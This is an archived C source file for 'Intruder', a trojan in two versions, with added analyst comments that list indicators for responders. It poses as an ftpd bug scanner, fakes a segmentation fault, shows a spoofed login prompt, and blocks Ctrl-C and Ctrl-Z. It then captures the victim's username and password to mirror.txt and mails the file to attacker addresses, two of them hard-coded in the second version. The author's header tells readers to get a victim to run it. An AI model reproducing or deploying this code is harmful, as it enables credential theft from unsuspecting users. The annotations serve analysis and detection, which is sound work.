TUCoPS :: Unix :: General :: intrudrf.c

Intruder 1.02: claims to look for local ftpd bugs, then fakes a core dump and spoofs the login prompt. HAC:

/* Intruder 1.02 Written by the boys of #coderspc (Undernet) mostly
written by THeGZa, but I couldn't have done it without Guilly,
RedBull, and especially R33TaWRd. line 26 has char email[] =
"youremailaddress@here.com" change that with your e-mail address, and
 the user's login and pass will be sent to you. Get your victim to run
this program on their linux box (might work in other unices, don't know?)
it's disguised as a program to see if your system is vulnerable to
any ftp root bugs, then pretends a seg fault, goes back into a
hacked copy of the login sequence. Change this if you like, GIVE US
 CREDIT, for what we did, if you need to get a hold of me e-mail me 
at sam@webnetix.com. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


/*
 * Analyst summary (first version).
 *
 * This is a fake-login credential trap, not a scanner: no FTP code is present.
 * The program prints a "searching" banner, prints a fake crash message,
 * clears the screen, shows the contents of /etc/issue.net followed by a
 * "localhost login:" / "Password:" prompt, writes whatever is typed to
 * mirror.txt in the current working directory and then pipes that file to
 * the `mail` command.
 *
 * Artefacts a responder can look for, all visible in the code below:
 *   - a file named mirror.txt left in the directory the program was run from
 *     (it is never deleted);
 *   - the terminal's suspend character changed to ^G and never restored
 *     (visible in `stty -a`);
 *   - shell children spawned through popen()/system(): `cat /etc/issue.net`,
 *     `clear`, `stty susp ^G` and `mail <address> < mirror.txt`.
 *
 * The prompt always says "localhost" regardless of the real hostname, and
 * nothing in this function turns terminal echo off, so the password is
 * presumably shown as it is typed -- both differ from a genuine login prompt.
 */
void main()
{
   char input1[10];   /* receives the typed password (10 bytes, filled by gets) */
   char input[10];    /* receives the typed login name (10 bytes, filled by gets) */
   char var[80] = {0};      /* holds the /etc/issue.net banner text */
   char buffer1[80] = {0};  /* never used in this function */
   FILE *fp;     /* pipe from `cat /etc/issue.net` */
   FILE *file;   /* handle for mirror.txt */
   char email[] = "your@emailaddresshere.com"; // placeholder recipient of the mailed capture file
   char *foo;    /* heap buffer for the mail command line */
   /* Staging area for the captured pair; both fields are 10 bytes. */
   struct login
   {
      char id[10];
      char password[10];
   }loginfake;
   /* if(getuid() !=0) //make sure were root
   {
     printf("you are not root, you cannot run this program, please su to root\n");
     exit(-1);
    } */
     printf("Searching for ftp root bugs\n"); /* decoy banner only */
   /* Refuses to run when TERM is exactly "rxvt" or "xterm". The getenv()
      result is not checked, so an unset TERM passes NULL to strcmp(). */
   if(!strcmp( getenv("TERM"), "rxvt")) //make sure were not in X
   {
      printf("need to be running in console press CTRL-ALT-F5 to open console terminal\n");
      exit(-1);
   }
   if(!strcmp( getenv("TERM"), "xterm"))
   {
      printf("need to be running in console press CTRL-ALT-F5 to open console terminal\n");
      exit(-1);
   }

   /* Cosmetic progress dots with one-second pauses. */
   sleep( 1 );
   printf(".\n ");
   sleep( 1 );
   printf(".\n");
   sleep( 1 );
   printf(".\n");
   sleep(1);
   sleep(1);
   /* The "Segmentation Fault" below is a printed string; the process keeps running. */
   printf("Found a root bug!!! inSegmentation Fault (core dumped)\n");
   sleep(1);
   system("clear");
   printf("\n");
   /* Reads the system's pre-login banner so the fake prompt looks local.
      The popen() result is not checked and the pipe is never pclose()d.
      A banner of 80 bytes or more fills var with no terminating NUL. */
   fp = popen("cat /etc/issue.net", "r"); //login info
   fread(var, 80, 1, fp);
   /* Rebinds the terminal's suspend key to ^G; the setting is not restored on exit. */
   system("stty susp ^G"); //so they can't escape out of login
   printf("%s",var);
   printf("\n");
   printf("localhost login: ");
   /* gets() has no length limit; input is only 10 bytes. */
   gets(input);
   
   printf("Password: ");
   /* Same unbounded read into a 10-byte buffer. */
   gets(input1);
   printf("\n");
   /* Fake error text shown after the capture. */
   printf("/bin/login cannot open /etc/motd\n");
   printf("running terminal safe mode!\n");
   printf("\n");
   strcpy(loginfake.id, input);
   strcpy(loginfake.password, input1);
   /* Capture file: relative path, so it lands in the current working directory.
      The fopen() result is not checked. Format written: "<login> <password>". */
   file = fopen("mirror.txt","w");
   fprintf(file, "%s %s",loginfake.id,loginfake.password);
   fclose(file);
   /* The malloc() result is not checked and the buffer is never freed. */
   foo=(char *)malloc(4096); 
   sprintf(foo,"mail %s < mirror.txt",email); // e-mail login and pass
   /* Runs the mail command through the shell; mirror.txt stays on disk afterwards. */
   system(foo);
}



------------------------------------------------------------------------
Here is a newer version:
------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>
/* Staging record for the captured login name and password.
   Each field holds at most 8 characters plus the terminating NUL. */
typedef struct
{
   char id[9];
   char password[9];
} login;
login loginfake;   /* single file-scope instance, written by fakelogin() */
void scanend(char *string);   /* cuts a string at CR/LF within its first 78 bytes */
void testX();       /* exits if TERM names one of five X terminal emulators */
void pimpthem();    /* prints the decoy progress dots and fake crash message */
void fakelogin();   /* shows the spoofed prompt and writes mirror.txt */
void sttystuff();   /* rebinds the terminal's suspend and interrupt keys */
void emailus();     /* mails mirror.txt to two hard-coded addresses */
/*
 * Analyst summary (second version): same fake-login credential trap as the
 * first listing, split into helpers. Order of operations: decoy banner,
 * terminal-type check, fake crash message, terminal key rebinding, spoofed
 * login prompt with capture to mirror.txt, then mailing of that file.
 * No FTP-related code is present anywhere in the listing.
 */
void main()
{
  printf("Searching for local ftpd bugs.\n"); /* decoy banner only */
  testX();
  pimpthem();
  sttystuff();   /* runs before the prompt, so the key rebinding is already active */
  fakelogin();
  emailus();
  
}

/*
 * Replace every line feed (10) and carriage return (13) found in the first
 * 78 bytes of `string` with a NUL byte, so the text ends at the first line
 * break. The scan always covers 78 bytes, so the caller must pass a buffer
 * at least that large.
 */
void scanend(char *string)
{
  char *cursor = string;
  char *const limit = string + 78;

  while (cursor < limit)
  {
    switch (*cursor)
    {
      case 10:   /* line feed */
      case 13:   /* carriage return */
        *cursor = 0;
        break;
      default:
        break;
    }
    cursor++;
  }
}

/*
 * Terminal-type gate: exits with exit(-1) when TERM is exactly one of
 * "xterm", "xterm-color", "rxvt", "rxvt-color" or "nxterm"; otherwise
 * returns and the program continues.
 *
 * Notes for analysis:
 *   - getenv("TERM") is not checked for NULL before strcmp().
 *   - Every printf() here passes the char array noX to a %c conversion,
 *     a format/argument mismatch, so the intended message is not printed
 *     as written.
 */
void testX()
{
   char xterm[] = "xterm";
   char xtermcolor[] = "xterm-color";
   char rxvt[] = "rxvt";
   char rxvtcolor[] = "rxvt-color";
   char nxterm[] = "nxterm";
   char noX[] = "You are in X, please exit to run this program";
   if(! (strcmp(getenv("TERM"), xterm)))
   {
     printf("%c\n",noX); 
     exit(-1);
   }
   if( (!strcmp(getenv("TERM"), xtermcolor)))
   {
     printf("%c\n",noX);
     exit(-1);
   }
  if(! (strcmp(getenv("TERM"), rxvt)))
  {
    printf("%c\n",noX);
    exit(-1);
  }
  if(!(strcmp(getenv("TERM"),rxvtcolor)))
  {
    printf("%c\n",noX);
    exit(-1);
  }
  if(!(strcmp(getenv("TERM"),nxterm)))
  {
    printf("%c\n",noX);
    exit(-1);
  }
}

/*
 * Decoy stage: prints three dots one second apart, then a fake crash
 * message, then clears the screen. The "Segmentation Fault (core dumped)"
 * text is an ordinary printed string; no fault occurs and no core file is
 * written by this code.
 */
void pimpthem()
{
  printf("\n");
  printf(".\n");
  sleep( 1 );
  printf(".\n");
  sleep( 1 );
  printf(".\n");
  sleep( 1 );
  printf("found buffer overide bug iSegmentation Fault (core dumped)\n");
  sleep( 1 );
  /* Wipes the decoy output so the spoofed prompt appears on a clean screen. */
  system("clear");
  
}

/*
 * Spoofed login prompt and capture.
 *
 * Prints the contents of /etc/issue.net, then "<hostname> login: " using the
 * first line of /etc/HOSTNAME, reads a login name with gets() and a password
 * with getpass() (which reads without echo), and writes both plus the real
 * UID of the invoking user to mirror.txt in the current working directory.
 *
 * Artefacts for responders: mirror.txt containing lines starting
 * "username:", "password:" and "UID:"; a `cat /etc/issue.net` child process.
 *
 * Notes for analysis: none of the popen()/fopen() results are checked, the
 * pipe and the hostname file are never closed, and the typed values are
 * copied into the 9-byte fields of loginfake with strcpy() without any
 * length check.
 */
void fakelogin()
{
   char *input1[10]={0};   /* array of 10 pointers; only element 0 is used */
   char input[10];         /* typed login name, filled by gets() with no limit */
   char var[80] = {0};     /* /etc/issue.net banner text */
   char buffer[80] = {0};  /* never used in this function */
   FILE *fp;
   FILE *file;
   char hostname[80]={0};
   FILE *hostnamefile;
  
   /* A banner of 80 bytes or more fills var with no terminating NUL. */
   fp = popen("cat /etc/issue.net", "r");
   fread(var, 80, 1, fp);
  
   printf("\n");
   printf("%s",var);
   printf("\n");
  
   /* Reads at most 78 bytes, so the zero-initialised buffer stays terminated;
      scanend() then cuts the text at the first line break. */
   hostnamefile=fopen("/etc/HOSTNAME","r");
   fread(hostname,78,1,hostnamefile);
   scanend(hostname);
   printf("%s login: ",hostname);
   gets(input);
  
   /* getpass() returns a pointer to its own static buffer. */
   *input1=getpass("Password: ");
   printf("\n");
  
   /* Fake error text shown after the capture. */
   printf("/bin/cat cannot open /etc/motd cought buffer overide!\n");
   printf("opening system fix shell, run fsck\n");
   
   /* Destination fields are 9 bytes each; the sources are not length-checked. */
   strcpy(loginfake.id, input);
   strcpy(loginfake.password, *input1);
   
   /* Relative path: the capture file lands in the current working directory. */
   file = fopen("mirror.txt","w");
   fprintf(file, "username:%s\npassword:%s\nUID:%i",loginfake.id, loginfake.password, getuid());
   fclose(file);
}

/*
 * Exfiltration stage: builds two shell command lines of the form
 * "mail <address> < mirror.txt" and runs each through system(), sending the
 * capture file to the two hard-coded addresses below.
 *
 * Artefacts for responders: two `mail` processes started via the shell,
 * outbound messages to these addresses in the local mail logs or queue
 * (depending on how `mail` is configured on the host), and mirror.txt,
 * which is not removed afterwards.
 *
 * The malloc() results are not checked and neither buffer is freed.
 */
void emailus()
{
  char guilly[] = "gchamber@videotron.ca";
  char thegza[] = "yacoubi@ibm.net";
  char *foo;   /* command line for the first recipient */
  char *poo;   /* command line for the second recipient */
  
  foo=(char *)malloc(4096);
  sprintf(foo, "mail %s < mirror.txt",guilly);
  poo=(char *)malloc(4096);
  sprintf(poo, "mail %s < mirror.txt",thegza);
  system(foo);
  system(poo);
}

/*
 * Rebinds two terminal control characters through the shell: suspend
 * becomes ^G and interrupt becomes ^Q, so the usual Ctrl-Z and Ctrl-C keys
 * no longer suspend or interrupt the foreground program. Nothing in this
 * listing restores the original settings, so the changed bindings remain on
 * the terminal after the program ends and show up in `stty -a`.
 */
void sttystuff()
{
  system("stty susp ^G");
  system("stty intr ^Q");
}

